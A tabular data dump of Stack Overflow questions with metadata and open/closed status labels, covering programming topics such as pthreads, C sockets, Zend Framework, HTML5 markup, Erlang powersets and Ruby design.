PostId
int64
13
11.8M
PostCreationDate
stringlengths
19
19
OwnerUserId
int64
3
1.57M
OwnerCreationDate
stringlengths
10
19
ReputationAtPostCreation
int64
-33
210k
OwnerUndeletedAnswerCountAtPostTime
int64
0
5.77k
Title
stringlengths
10
250
BodyMarkdown
stringlengths
12
30k
Tag1
stringlengths
1
25
Tag2
stringlengths
1
25
Tag3
stringlengths
1
25
Tag4
stringlengths
1
25
Tag5
stringlengths
1
25
PostClosedDate
stringlengths
19
19
OpenStatus
stringclasses
5 values
unified_texts
stringlengths
47
30.1k
OpenStatus_id
int64
0
4
2,249,577
02/12/2010 03:54:50
31,671
10/27/2008 01:07:58
8,212
468
Could browsing the PHP source code help a PHP developer learn C?
I've started checking out the [source code for PHP][1]. I have just started trying to learn C, and since I have a good working knowledge of PHP, would dissecting typical functions I use daily be of great benefit? Or is this likely to be too in-depth for a C beginner? Also, where are most of the functions defined in that source I linked to above? [1]: http://github.com/php/php-src/tree/master/main/
php
source-code
c
null
null
null
open
Could browsing the PHP source code help a PHP developer learn C? === I've started checking out the [source code for PHP][1]. I have just started trying to learn C, and since I have a good working knowledge of PHP, would dissecting typical functions I use daily be of great benefit? Or is this likely to be too in-depth for a C beginner? Also, where are most of the functions defined in that source I linked to above? [1]: http://github.com/php/php-src/tree/master/main/
0
9,912,391
03/28/2012 17:06:45
602,969
02/04/2011 10:25:48
80
13
Is it possible to draw a pentagon knowing only one side of the shape?
I know there are a few tutorials, how to draw an evenly divided pentagon starting from circle, but I don't know if its possible to draw it backward so that we have an arbitrary length of the one side of the pentagon only. I'd like to see any solution available. I'm using compass and liner, no degree functions.
math
geometry
null
null
null
03/29/2012 06:03:10
off topic
Is it possible to draw a pentagon knowing only one side of the shape? === I know there are a few tutorials, how to draw an evenly divided pentagon starting from circle, but I don't know if its possible to draw it backward so that we have an arbitrary length of the one side of the pentagon only. I'd like to see any solution available. I'm using compass and liner, no degree functions.
2
6,042,970
05/18/2011 10:06:48
84,017
03/28/2009 14:39:33
398
5
pthread_detach question
Till recently, I was under the impression that if you "detach" a thread after spawning it, the thread lives even after the "main" thread terminates. But a little experiment (listed below) goes contrary to my belief. I expected the detached thread to keep printing "Speaking from the detached thread" even after main terminated, but this does not seem to be happening. The application apparently terminates... Do the "detached" threads die after "main" issues **return 0**? #include <pthread.h> #include <stdio.h> void *func(void *data) { while (1) { printf("Speaking from the detached thread...\n"); sleep(5); } pthread_exit(NULL); } int main() { pthread_t handle; if (!pthread_create(&handle, NULL, func, NULL)) { printf("Thread create successfully !!!\n"); if ( ! pthread_detach(handle) ) printf("Thread detached successfully !!!\n"); } sleep(5); printf("Main thread dying...\n"); return 0; }
c
linux
multithreading
pthreads
null
null
open
pthread_detach question === Till recently, I was under the impression that if you "detach" a thread after spawning it, the thread lives even after the "main" thread terminates. But a little experiment (listed below) goes contrary to my belief. I expected the detached thread to keep printing "Speaking from the detached thread" even after main terminated, but this does not seem to be happening. The application apparently terminates... Do the "detached" threads die after "main" issues **return 0**? #include <pthread.h> #include <stdio.h> void *func(void *data) { while (1) { printf("Speaking from the detached thread...\n"); sleep(5); } pthread_exit(NULL); } int main() { pthread_t handle; if (!pthread_create(&handle, NULL, func, NULL)) { printf("Thread create successfully !!!\n"); if ( ! pthread_detach(handle) ) printf("Thread detached successfully !!!\n"); } sleep(5); printf("Main thread dying...\n"); return 0; }
0
5,441,367
03/26/2011 09:12:02
469,999
10/08/2010 08:08:14
59
0
Java Springs : base64 encoded image compression/resize
I had base64 encode image in string format. Need to compress/resize it to different size, i.e. Image files created from these compressed/resized base64 encoded images are of different size. What Compression/resize algorithm/jar can be used in Java?
compression
image-manipulation
base64
null
null
null
open
Java Springs : base64 encoded image compression/resize === I had base64 encode image in string format. Need to compress/resize it to different size, i.e. Image files created from these compressed/resized base64 encoded images are of different size. What Compression/resize algorithm/jar can be used in Java?
0
2,206,927
02/05/2010 11:47:46
266,810
02/05/2010 06:09:40
1
0
How to use Server.Transfer or Response.Redirect from ajax UpdatePanel?
How to use Server.Transfer or Response.Redirect from ajax UpdatePanel?
server.transfer
updatepanel
ajax
response
null
null
open
How to use Server.Transfer or Response.Redirect from ajax UpdatePanel? === How to use Server.Transfer or Response.Redirect from ajax UpdatePanel?
0
5,410,177
03/23/2011 18:55:41
124,411
06/17/2009 14:54:15
178
3
How to communicate between server and android?
Which is better way to send messages from server (Java) to android client? Comet, socket, xmpp or something else? I'm going to develop simple client-server game.
android
null
null
null
null
null
open
How to communicate between server and android? === Which is better way to send messages from server (Java) to android client? Comet, socket, xmpp or something else? I'm going to develop simple client-server game.
0
8,722,840
01/04/2012 06:22:38
1,111,116
12/22/2011 05:41:13
16
0
Android - tween animation to use with OpenGL
I need to animate some objects on my GLSurfaceView by changing their properties - size, position, rotation angle etc. I want to use interpolators to change rate of my animation (accelerate/decelerate) and I also need to know when it ends (onAnimationEnd listener). android.animation.Animator class is perfect for this job, but unfortunately it requires API 11 and I'm developing for API 7. Is there any other class that I can use? Maybe third-party, but light and optimized for Android. Thanks!
android
opengl
animation
null
null
null
open
Android - tween animation to use with OpenGL === I need to animate some objects on my GLSurfaceView by changing their properties - size, position, rotation angle etc. I want to use interpolators to change rate of my animation (accelerate/decelerate) and I also need to know when it ends (onAnimationEnd listener). android.animation.Animator class is perfect for this job, but unfortunately it requires API 11 and I'm developing for API 7. Is there any other class that I can use? Maybe third-party, but light and optimized for Android. Thanks!
0
7,845,258
10/21/2011 05:18:22
165,107
08/28/2009 20:55:46
3,443
36
How to Write MultiCore multithreaded application?
I have one application that is running in server and I want to use whole resource of that server. That is multicore server. And I need omulti thread design that use all memory and all core and run max to max thread at a time. How Can I implement this multithreading. Please suggest me design and code id possible. Thanks Pankaj mishra
multithreading
threadpool
multicore
null
null
10/21/2011 20:17:11
not a real question
How to Write MultiCore multithreaded application? === I have one application that is running in server and I want to use whole resource of that server. That is multicore server. And I need omulti thread design that use all memory and all core and run max to max thread at a time. How Can I implement this multithreading. Please suggest me design and code id possible. Thanks Pankaj mishra
1
6,794,404
07/22/2011 18:22:20
48,523
12/23/2008 00:36:38
4,400
82
Zend Framework: How to stop dispatch/controller execution?
I have a Zend Framework controller with an `editAction()`. class WidgetController extends BaseController { public function editAction() { //code here } } This controller extends a base controller which checks if the user is logged in before allowing the user to edit a record. class BaseController extends Zend_Controller_Action { public function init() { if ($this->userNotLoggedIn()) { return $this->_redirect('/auth/login'); } } } However, now that I am performing an AJAX request, I will be sending a JSON response back, so a redirect will no longer work. I need to stop further controller execution so I can immediately send a response: class BaseController extends Zend_Controller_Action { public function init() { if ($this->userNotLoggedIn()) { if ($this->_request->isXmlHttpRequest()) { $jsonData = Zend_Json::encode(array('error'=>'You are not logged in!')); $this->getResponse() ->setHttpResponseCode(401) ->setBody($jsonData) ->setHeader('Content-Type', 'text/json'); //now stop controller execution so that the WidgetController does not continue } else { return $this->_redirect('/auth/login'); } } } } How can I stop controller execution?
ajax
zend-framework
zend-controller
null
null
null
open
Zend Framework: How to stop dispatch/controller execution? === I have a Zend Framework controller with an `editAction()`. class WidgetController extends BaseController { public function editAction() { //code here } } This controller extends a base controller which checks if the user is logged in before allowing the user to edit a record. class BaseController extends Zend_Controller_Action { public function init() { if ($this->userNotLoggedIn()) { return $this->_redirect('/auth/login'); } } } However, now that I am performing an AJAX request, I will be sending a JSON response back, so a redirect will no longer work. I need to stop further controller execution so I can immediately send a response: class BaseController extends Zend_Controller_Action { public function init() { if ($this->userNotLoggedIn()) { if ($this->_request->isXmlHttpRequest()) { $jsonData = Zend_Json::encode(array('error'=>'You are not logged in!')); $this->getResponse() ->setHttpResponseCode(401) ->setBody($jsonData) ->setHeader('Content-Type', 'text/json'); //now stop controller execution so that the WidgetController does not continue } else { return $this->_redirect('/auth/login'); } } } } How can I stop controller execution?
0
11,260,743
06/29/2012 11:11:42
409,617
08/03/2010 11:57:39
774
35
Top most class of ruby 1.8.7 and 1.9.1
This is my interview questions. Which one is the top most class of ruby 1.8.7 and ruby 1.9.1? Thanks.
ruby
null
null
null
null
06/29/2012 17:34:37
not a real question
Top most class of ruby 1.8.7 and 1.9.1 === This is my interview questions. Which one is the top most class of ruby 1.8.7 and ruby 1.9.1? Thanks.
1
3,882,843
10/07/2010 14:45:27
467,929
10/06/2010 12:22:02
1
1
how can use ugly slugs in wordpress using non-western character?
like i said in the question : how can use ugly slugs in wordpress using non-western character? more details at : http://en.support.wordpress.com/posts/post-title-url/ > If your language uses a non-western > character set, long post titles can > break post slugs. To fix that, shorten > the post slug to a single word. so i want keep lonk post titles evenif i use a non-western character like arabic , so please anyone can help me?
wordpress
null
null
null
null
null
open
how can use ugly slugs in wordpress using non-western character? === like i said in the question : how can use ugly slugs in wordpress using non-western character? more details at : http://en.support.wordpress.com/posts/post-title-url/ > If your language uses a non-western > character set, long post titles can > break post slugs. To fix that, shorten > the post slug to a single word. so i want keep lonk post titles evenif i use a non-western character like arabic , so please anyone can help me?
0
4,660,968
01/11/2011 18:04:12
837,214
01/11/2011 17:57:12
1
0
factorial using recursion+pointers
i am learning C programming, i was trying to write a recursive function by using this prototype: void fact(int *n); The parameter of this function should be passed by reference. Thanks for your help.
c
pointers
factorial
null
null
01/11/2011 18:28:09
not a real question
factorial using recursion+pointers === i am learning C programming, i was trying to write a recursive function by using this prototype: void fact(int *n); The parameter of this function should be passed by reference. Thanks for your help.
1
7,209,567
08/26/2011 19:21:48
4,144
09/02/2008 02:27:42
1,858
38
HTML5 Semantic mark up help
I'm just starting a new app. Below is a basic mockup of what I am tasked to do. I'm new to using HTML5 for my semantic markup so I'd like some feedback/help. I'd like to understand how/where to use things like `<nav>` and `<section>` <body> <div id="container"> <header> <div id="appInformation"> <a href="#" alt="Home"> <img src=""> </a> <span>Selected AppName</span> </div> <div> <span id="time">TIME GOES HERE</span> </div> <div> <a href="#" alt="Additional Information"> <img src=""><!-- This is will be the location of the the 'i'--> </a> </div> <div class=""> <label>UserName</label> </div> </header> <div id="main"> <!-- main content for the selected app here --> </div> <footer> <div id="appVersion"> VERSION # HERE </div> <nav> <ul> <li> <a href="#">FAQ</a> </li> </ul> </nav> <div id=""> <!-- Team logo here--> </div> </footer> ![enter image description here][1] [1]: http://i.stack.imgur.com/xw7cR.png
html5
markup
semantic-markup
null
null
null
open
HTML5 Semantic mark up help === I'm just starting a new app. Below is a basic mockup of what I am tasked to do. I'm new to using HTML5 for my semantic markup so I'd like some feedback/help. I'd like to understand how/where to use things like `<nav>` and `<section>` <body> <div id="container"> <header> <div id="appInformation"> <a href="#" alt="Home"> <img src=""> </a> <span>Selected AppName</span> </div> <div> <span id="time">TIME GOES HERE</span> </div> <div> <a href="#" alt="Additional Information"> <img src=""><!-- This is will be the location of the the 'i'--> </a> </div> <div class=""> <label>UserName</label> </div> </header> <div id="main"> <!-- main content for the selected app here --> </div> <footer> <div id="appVersion"> VERSION # HERE </div> <nav> <ul> <li> <a href="#">FAQ</a> </li> </ul> </nav> <div id=""> <!-- Team logo here--> </div> </footer> ![enter image description here][1] [1]: http://i.stack.imgur.com/xw7cR.png
0
6,190,455
05/31/2011 16:12:26
736,270
05/03/2011 13:57:30
1
0
Choosing the next language
I'm a college student in my 2nd year, and according to me I think I have intermediate knowledge of Java (which was taught in school) and advanced knowledge of Python (which is self taught). I want to know whether I should focus on mastering the languages that I currently know (like learning some new frameworks, etc.) or should I consider on learning another language like C/C++? My goal is to be a professional software developer and I want to invest my time doing something that would make my skills marketable or complement my current skills set. I am aware of the fact that Java is the most popular/demanded language at the moment, and some people (like my professor) say that languages like Java has major productivity gain compared to languages like C/C++ and the performance increase by resorting to C++ is not really that great. So, that puts doubts in my mind whether C/C++ would be worth learning. Side Note: I found Java to be really interesting and totally enjoyed working with Swing, etc. but I didn't really get enough time to invest in it because I got carried away with Python. So considering all of these options, please suggest something that would be a good investment of my time. Thanks.
java
c++
python
c
null
05/31/2011 16:14:21
not constructive
Choosing the next language === I'm a college student in my 2nd year, and according to me I think I have intermediate knowledge of Java (which was taught in school) and advanced knowledge of Python (which is self taught). I want to know whether I should focus on mastering the languages that I currently know (like learning some new frameworks, etc.) or should I consider on learning another language like C/C++? My goal is to be a professional software developer and I want to invest my time doing something that would make my skills marketable or complement my current skills set. I am aware of the fact that Java is the most popular/demanded language at the moment, and some people (like my professor) say that languages like Java has major productivity gain compared to languages like C/C++ and the performance increase by resorting to C++ is not really that great. So, that puts doubts in my mind whether C/C++ would be worth learning. Side Note: I found Java to be really interesting and totally enjoyed working with Swing, etc. but I didn't really get enough time to invest in it because I got carried away with Python. So considering all of these options, please suggest something that would be a good investment of my time. Thanks.
4
11,688,872
07/27/2012 13:35:48
1,356,819
04/25/2012 17:05:46
21
1
Whats the best parallax script
Im doing some research for a upcoming project. The project will be using the **parallax affect** ( it will be vertical ). I would like to use twitter bootstrap, as my main frountend framework. So there doesnt seem to be a plugin by twitterbootstrap that does this affect http://twitter.github.com/bootstrap/javascript.html I hoping that there is a jQuery plugin that can do the job smoothly and simply. Iv tryed some of these plugins http://www.ianlunn.co.uk/demos/recreate-nikebetterworld-parallax/ http://markdalgleish.com/projects/stellar.js/ The trick is that the parallaxs needs to be smooth in IE7 and up. **So my question is, which is the better script to uses, and is there a better script that i should be using rather then the ones iv mentioned above.**
jquery
internet-explorer
twitter-bootstrap
parallax
null
07/27/2012 13:49:40
not constructive
Whats the best parallax script === Im doing some research for a upcoming project. The project will be using the **parallax affect** ( it will be vertical ). I would like to use twitter bootstrap, as my main frountend framework. So there doesnt seem to be a plugin by twitterbootstrap that does this affect http://twitter.github.com/bootstrap/javascript.html I hoping that there is a jQuery plugin that can do the job smoothly and simply. Iv tryed some of these plugins http://www.ianlunn.co.uk/demos/recreate-nikebetterworld-parallax/ http://markdalgleish.com/projects/stellar.js/ The trick is that the parallaxs needs to be smooth in IE7 and up. **So my question is, which is the better script to uses, and is there a better script that i should be using rather then the ones iv mentioned above.**
4
11,302,067
07/02/2012 22:34:34
1,020,765
10/30/2011 14:30:19
1
0
Cloud Carousel plugin
I'm using the [Cloud carousel plugin](http://www.professorcloud.com/mainsite/carousel.htm), but i have a problem with right rotation. If I start the rotation with the right arrow the text (the title of the item) doesn't not change.
jquery
plugins
cloud
carousel
direction
07/03/2012 11:50:31
not a real question
Cloud Carousel plugin === I'm using the [Cloud carousel plugin](http://www.professorcloud.com/mainsite/carousel.htm), but i have a problem with right rotation. If I start the rotation with the right arrow the text (the title of the item) doesn't not change.
1
9,091,941
02/01/2012 06:50:08
1,103,776
12/17/2011 18:28:57
1
0
JQuery Selecting the text next to radio buttons
Hi all you Jquery experts :-) I need some help. I have a div inside which there are some radio buttons generated dynamically with a piece of text next to each radio button also generated dynamically, inside a <span> element, like below: <div class="mother_div"> <input type="radio" class="child_radio" name="amount" value="0" /><span class="child_text">0.0 some text</span> <input type="radio" class="child_radio" name="amount" value="1" /><span class="child_text">1.0 some text</span> <input type="radio" class="child_radio" name="amount" value="2" /><span class="child_text">2.0 some text</span> <input type="radio" class="child_radio" name="amount" value="3" /><span class="child_text">3.0 some text</span> I need a Jquery method or function that would allow me to start with the mother_div and upon user clicking/checking a radio button (they are all unchecked to start with), to replace the text inside the span with the "child_text" class with a different string of HTML. What I tried so far is this, but it doesn't work: $("div.mother_div input:radio[name=child_radio]").click(function() { var newHTML= "some HTML to insert"; $(span.child_text).html(newHTML); }); Any thoughts or suggestions highly appreciated.
jquery
replace
radio-button
checked
null
null
open
JQuery Selecting the text next to radio buttons === Hi all you Jquery experts :-) I need some help. I have a div inside which there are some radio buttons generated dynamically with a piece of text next to each radio button also generated dynamically, inside a <span> element, like below: <div class="mother_div"> <input type="radio" class="child_radio" name="amount" value="0" /><span class="child_text">0.0 some text</span> <input type="radio" class="child_radio" name="amount" value="1" /><span class="child_text">1.0 some text</span> <input type="radio" class="child_radio" name="amount" value="2" /><span class="child_text">2.0 some text</span> <input type="radio" class="child_radio" name="amount" value="3" /><span class="child_text">3.0 some text</span> I need a Jquery method or function that would allow me to start with the mother_div and upon user clicking/checking a radio button (they are all unchecked to start with), to replace the text inside the span with the "child_text" class with a different string of HTML. What I tried so far is this, but it doesn't work: $("div.mother_div input:radio[name=child_radio]").click(function() { var newHTML= "some HTML to insert"; $(span.child_text).html(newHTML); }); Any thoughts or suggestions highly appreciated.
0
868,203
05/15/2009 11:41:42
1,150
08/12/2008 21:11:27
311
6
Is there any way to determine if an object in Java is softly reachable?
In order to perform some testing, I'd like to check how my application behaves when some or all of the objects I have stored in a cache of SoftReference'd objects are disposed of. In order to do this, I'd like to manually clear the references stored in the cached SoftReference objects - simulating the VM disposing of those objects - but only if nothing else currently has a strong reference to that object (which could be the case if another process had recently retrieved the referenced object from the cache). My application is single-threaded, so I don't need to worry about the soft reachability of a cached object changing as this code is executing. This also means that I don't currently have any locking mechanisms - if I did have, I could possibly have used these to determine whether or not an object was 'being used' and hence strongly reachable, but alas I don't have need of such locking. One approach I have tried is to create an additional SoftReference to every object stored in the cache which is registered with a ReferenceQueue. My hope was that in doing so, all of the softly reachable objects in the cache would have their additional SoftReference added to the queue, so all I had to do was loop over the queue, and remove those objects from my cache. However, it seems that the GC enqueues softly reachable objects to their respective queues at its leisure, so it is not guaranteed that anything will be added to the queue once I've finished iterating through the objects in the cache. One thing that I have also looked at is the -XX:SoftRefLRUPolicyMSPerMB JVM option with a very small value. With judicious memory allocation, this will quite probably clear softly reachable objects from the cache for me the moment they are softly reachable, but I'd really like the app to run normally until I receive a request to clear the softly reachable objects from the cache. As a JVM option, I don't believe I can alter this value while my app is running. So, does anyone have any ideas as to how I can determine whether or not an object is only softly reachable (and hence can be cleared)?
java
soft-references
null
null
null
null
open
Is there any way to determine if an object in Java is softly reachable? === In order to perform some testing, I'd like to check how my application behaves when some or all of the objects I have stored in a cache of SoftReference'd objects are disposed of. In order to do this, I'd like to manually clear the references stored in the cached SoftReference objects - simulating the VM disposing of those objects - but only if nothing else currently has a strong reference to that object (which could be the case if another process had recently retrieved the referenced object from the cache). My application is single-threaded, so I don't need to worry about the soft reachability of a cached object changing as this code is executing. This also means that I don't currently have any locking mechanisms - if I did have, I could possibly have used these to determine whether or not an object was 'being used' and hence strongly reachable, but alas I don't have need of such locking. One approach I have tried is to create an additional SoftReference to every object stored in the cache which is registered with a ReferenceQueue. My hope was that in doing so, all of the softly reachable objects in the cache would have their additional SoftReference added to the queue, so all I had to do was loop over the queue, and remove those objects from my cache. However, it seems that the GC enqueues softly reachable objects to their respective queues at its leisure, so it is not guaranteed that anything will be added to the queue once I've finished iterating through the objects in the cache. One thing that I have also looked at is the -XX:SoftRefLRUPolicyMSPerMB JVM option with a very small value. With judicious memory allocation, this will quite probably clear softly reachable objects from the cache for me the moment they are softly reachable, but I'd really like the app to run normally until I receive a request to clear the softly reachable objects from the cache. As a JVM option, I don't believe I can alter this value while my app is running. So, does anyone have any ideas as to how I can determine whether or not an object is only softly reachable (and hence can be cleared)?
0
8,627,366
12/24/2011 23:12:08
846,910
07/15/2011 17:32:48
515
0
Generate a powerset without a stack in Erlang
*Note: This is a sequel to my previous question about powersets.* I have got a nice Ruby solution to my previous [question][1] about generating a powerset of a set without a need to keep a stack: class Array def powerset return to_enum(:powerset) unless block_given? 1.upto(self.size) do |n| self.combination(n).each{|i| yield i} end end end # demo ['a', 'b', 'c'].powerset{|item| p item} # items are generated one at a time ps = [1, 2, 3, 4].powerset # no block, so you'll get an enumerator 10.times.map{ ps.next } # 10.times without a block is also an enumerator It does the job and works nice. However, I would like to try to rewrite the same solution in Erlang, because for the `{|item| p item}` block I have a big portion of working code already written in Erlang (it does some stuff with each generated subset). Although I have some experience with Erlang (I have read all 2 books :)), I am pretty confused with the [example][2] and the comments that [sepp2k][3] kindly gave me to my previous question about powersets. I do not understand the last line of the example - the only thing that I know is that is is a list comprehension. I do not understand how I can modify it to be able to do something with each generated subset (then throw it out and continue with the next subset). **How can I rewrite this Ruby iterative powerset generation in Erlang? Or maybe the provided Erlang example already almost suits the need?** [1]: http://stackoverflow.com/questions/8533336/generate-a-powerset-of-a-set-without-keeping-a-stack-in-erlang-or-ruby [2]: http://rosettacode.org/wiki/Power_set#Erlang [3]: http://stackoverflow.com/users/149392/sepp2k
erlang
subset
powerset
null
null
null
open
Generate a powerset without a stack in Erlang === *Note: This is a sequel to my previous question about powersets.* I have got a nice Ruby solution to my previous [question][1] about generating a powerset of a set without a need to keep a stack: class Array def powerset return to_enum(:powerset) unless block_given? 1.upto(self.size) do |n| self.combination(n).each{|i| yield i} end end end # demo ['a', 'b', 'c'].powerset{|item| p item} # items are generated one at a time ps = [1, 2, 3, 4].powerset # no block, so you'll get an enumerator 10.times.map{ ps.next } # 10.times without a block is also an enumerator It does the job and works nice. However, I would like to try to rewrite the same solution in Erlang, because for the `{|item| p item}` block I have a big portion of working code already written in Erlang (it does some stuff with each generated subset). Although I have some experience with Erlang (I have read all 2 books :)), I am pretty confused with the [example][2] and the comments that [sepp2k][3] kindly gave me to my previous question about powersets. I do not understand the last line of the example - the only thing that I know is that is is a list comprehension. I do not understand how I can modify it to be able to do something with each generated subset (then throw it out and continue with the next subset). **How can I rewrite this Ruby iterative powerset generation in Erlang? Or maybe the provided Erlang example already almost suits the need?** [1]: http://stackoverflow.com/questions/8533336/generate-a-powerset-of-a-set-without-keeping-a-stack-in-erlang-or-ruby [2]: http://rosettacode.org/wiki/Power_set#Erlang [3]: http://stackoverflow.com/users/149392/sepp2k
0
7,474,556
09/19/2011 16:58:37
398,640
07/22/2010 02:14:51
944
59
Mac OS X and Adobe Air trace does not work
For some reason trace does not work on when I put `trace` into my ActionScript files. I use the Flex SDK to build Adobe Air applications. I am currently on Flex SDK 4.5.1 and Adobe Air 2.7. I have checked that `idl` is not running, can't find a trace of it ( pun not intended ). I have also added `mm.cgf` to ~/Library/Application\ Support/Macromedia, that hasn't worked either. Any other suggestions?
flex
osx
air
osx-snow-leopard
null
null
open
Mac OS X and Adobe Air trace does not work === For some reason trace does not work on when I put `trace` into my ActionScript files. I use the Flex SDK to build Adobe Air applications. I am currently on Flex SDK 4.5.1 and Adobe Air 2.7. I have checked that `idl` is not running, can't find a trace of it ( pun not intended ). I have also added `mm.cgf` to ~/Library/Application\ Support/Macromedia, that hasn't worked either. Any other suggestions?
0
9,654,424
03/11/2012 11:11:00
1,262,119
03/11/2012 10:29:38
1
0
curious thing happened in linux socket programming
I'm a new beginner in linux socket programing. I am trying to build a server which can serve for many clients. The server just do a simple job: get the input string from client and then change each letter to upper case. But the problem is, when I try to shut down one client, for example, type "Ctrl-C", then my OS will be shut down suddenly. I use the Ubuntu 10.10 and CentOS to test my program, but always the same problem. Here's my source code: /* client.c */ #include <stdio.h> #include <signal.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <netinet/in.h> #define MAXLINE 80 #define SERV_PORT 8000 int main (void) { struct sockaddr_in servaddr, cliaddr; char buf[MAXLINE]; int sockfd, n; sockfd = socket(AF_INET, SOCK_STREAM, 0); bzero(&servaddr, sizeof(servaddr)); servaddr.sin_family = AF_INET; inet_pton(AF_INET, "127.0.0.1", &servaddr.sin_addr); servaddr.sin_port = htons(SERV_PORT); connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)); while (fgets(buf, MAXLINE, stdin) != NULL) { write(sockfd, buf, strlen(buf)); n = read(sockfd, buf, MAXLINE); if(n == 0) printf("Connect closed\n"); else write(STDOUT_FILENO, buf, n); } close(sockfd); return 0; } ---------- /* server */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <netinet/in.h> #define MAXLINE 80 #define SERV_PORT 8000 void sigchld_func (int signo) { wait(NULL); } int main (void) { struct sockaddr_in servaddr, cliaddr; char buf[MAXLINE]; char str[INET_ADDRSTRLEN]; int listenfd, connfd; socklen_t cliaddr_len; int n, i; pid_t pid; signal(SIGCHLD, sigchld_func); listenfd = socket(AF_INET, SOCK_STREAM, 0); bzero(&servaddr, sizeof(servaddr)); servaddr.sin_family = AF_INET; servaddr.sin_addr.s_addr = htonl(INADDR_ANY); servaddr.sin_port = htons(SERV_PORT); bind(listenfd, (struct sockaddr *)&servaddr, sizeof(servaddr)); listen(listenfd, 20); printf("Accepting connections...\n"); while (1) { cliaddr_len = sizeof(cliaddr); connfd = accept(listenfd, (struct sockaddr *)&cliaddr, &cliaddr_len); if ((pid = fork()) < 0) { perror("fork error!"); exit(1); } else if (pid > 0) { close(connfd); } else { close(listenfd); while (1) { n = read(connfd, buf, MAXLINE); if (n <= 0) { printf("Connection closed\n"); break; } inet_ntop(AF_INET, &cliaddr.sin_addr, str, sizeof(str)); printf("Received from %s at port %d\n", str, ntohs(cliaddr.sin_port)); for (i = 0; i < n; i++) buf[i] = toupper(buf[i]); write(connfd, buf, n); } close(connfd); } } return 0; }
sockets
null
null
null
null
null
open
curious thing happened in linux socket programming === I'm a new beginner in linux socket programing. I am trying to build a server which can serve for many clients. The server just do a simple job: get the input string from client and then change each letter to upper case. But the problem is, when I try to shut down one client, for example, type "Ctrl-C", then my OS will be shut down suddenly. I use the Ubuntu 10.10 and CentOS to test my program, but always the same problem. Here's my source code: /* client.c */ #include <stdio.h> #include <signal.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <netinet/in.h> #define MAXLINE 80 #define SERV_PORT 8000 int main (void) { struct sockaddr_in servaddr, cliaddr; char buf[MAXLINE]; int sockfd, n; sockfd = socket(AF_INET, SOCK_STREAM, 0); bzero(&servaddr, sizeof(servaddr)); servaddr.sin_family = AF_INET; inet_pton(AF_INET, "127.0.0.1", &servaddr.sin_addr); servaddr.sin_port = htons(SERV_PORT); connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)); while (fgets(buf, MAXLINE, stdin) != NULL) { write(sockfd, buf, strlen(buf)); n = read(sockfd, buf, MAXLINE); if(n == 0) printf("Connect closed\n"); else write(STDOUT_FILENO, buf, n); } close(sockfd); return 0; } ---------- /* server */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <netinet/in.h> #define MAXLINE 80 #define SERV_PORT 8000 void sigchld_func (int signo) { wait(NULL); } int main (void) { struct sockaddr_in servaddr, cliaddr; char buf[MAXLINE]; char str[INET_ADDRSTRLEN]; int listenfd, connfd; socklen_t cliaddr_len; int n, i; pid_t pid; signal(SIGCHLD, sigchld_func); listenfd = socket(AF_INET, SOCK_STREAM, 0); bzero(&servaddr, sizeof(servaddr)); servaddr.sin_family = AF_INET; servaddr.sin_addr.s_addr = htonl(INADDR_ANY); servaddr.sin_port = htons(SERV_PORT); bind(listenfd, (struct sockaddr *)&servaddr, sizeof(servaddr)); listen(listenfd, 20); printf("Accepting connections...\n"); while (1) { cliaddr_len = sizeof(cliaddr); connfd = accept(listenfd, (struct sockaddr *)&cliaddr, &cliaddr_len); if ((pid = fork()) < 0) { perror("fork error!"); exit(1); } else if (pid > 0) { close(connfd); } else { close(listenfd); while (1) { n = read(connfd, buf, MAXLINE); if (n <= 0) { printf("Connection closed\n"); break; } inet_ntop(AF_INET, &cliaddr.sin_addr, str, sizeof(str)); printf("Received from %s at port %d\n", str, ntohs(cliaddr.sin_port)); for (i = 0; i < n; i++) buf[i] = toupper(buf[i]); write(connfd, buf, n); } close(connfd); } } return 0; }
0
8,223,984
11/22/2011 08:38:13
1,059,364
11/22/2011 08:30:29
1
0
IntelliJ-Idea 10.5.x, Flex and Maven 3/2
Currently, I'm trying to use latest maven to build flex projects in IntelliJ-Idea. But have no success. What is the best way to do it?
flex
intellij-idea
maven-3
null
null
11/23/2011 05:12:48
not a real question
IntelliJ-Idea 10.5.x, Flex and Maven 3/2 === Currently, I'm trying to use latest maven to build flex projects in IntelliJ-Idea. But have no success. What is the best way to do it?
1
6,615,536
07/07/2011 18:44:39
37,959
11/15/2008 19:10:24
65
3
Thin vs. unicorn for development mode on Mac?
I'm shocked that this question hasn't been asked already, but I swear I looked everywhere. Are there advantages of thin over unicorn, or vice versa, when running Rails 3 in development mode?
ruby-on-rails-3
development-environment
thin
unicorn
null
null
open
Thin vs. unicorn for development mode on Mac? === I'm shocked that this question hasn't been asked already, but I swear I looked everywhere. Are there advantages of thin over unicorn, or vice versa, when running Rails 3 in development mode?
0
8,982,382
01/24/2012 05:25:31
903,643
08/20/2011 10:38:49
715
11
How should I program this in Ruby
Sorry about the lousy title. I don't know what I should call it. It involves a lot of meta-programming (i think) and that's what I am trying to avoid as much as I can. Here's what I am trying to do: The user enters a string. The string contains 2 parts. An `Event` class and a method in that event and an `Action` class and a method in that action. So the string will look like this: `{EventClass: someMethod=>arg1, arg2, arg3....}, {Action: someMethod=>arg1, arg2, arg3....}`. So a concrete example of this would be: `{TwitterEvent: newTweet=>arg1, arg2, arg3....}, {PersistenceAction: saveToHardDrive=>arg1 arg2...}` So then I will parse this string, instantiate an instance of `TwitterEvent`, call that method on it. Then do the same thing for `PersistenceAction` Has anyone programmed something like this? What the best "design" for this type of application? How would I dynamically instantiate classes from parsed string and then call method? And potentially, the method will have arguments? How would I detect/handle errors? Also, how w Thanks
ruby
null
null
null
null
01/24/2012 14:29:47
not a real question
